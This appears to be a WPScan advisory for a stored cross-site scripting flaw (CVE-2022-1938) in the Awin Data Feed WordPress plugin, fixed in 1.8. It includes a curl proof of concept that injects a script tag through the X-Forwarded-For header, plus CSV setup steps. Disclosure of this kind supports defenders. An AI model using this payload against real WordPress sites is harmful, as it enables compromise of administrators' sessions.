WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Awin Data Feed < 1.8 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape a header when processing request to generate analytics data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against a logged in admin viewing the plugin's settings

Proof of Concept

With a feed set in the plugin, open the URL, invoke the command below

curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data 'action=track_user_click&feedId=1' \
    -H 'X-Forwarded-For: "><script>alert("xss");</script>'

The XSS will be triggered when an admin visits the plugin's settings (/wp-admin/admin.php?page=datafeed-settings)

Note: To set a feed, simply import the following CSV via the plugin:

categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price

Affects Plugins

awin-data-feed
Fixed in version 1.8

References

CVE
CVE-2022-1938

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
70aed824-c53e-4672-84c9-039dc34ed5fa

Timeline

Publicly Published

2022-06-16 (about 7 months ago)

Added

2022-06-16 (about 7 months ago)

Last Updated

2022-07-27 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin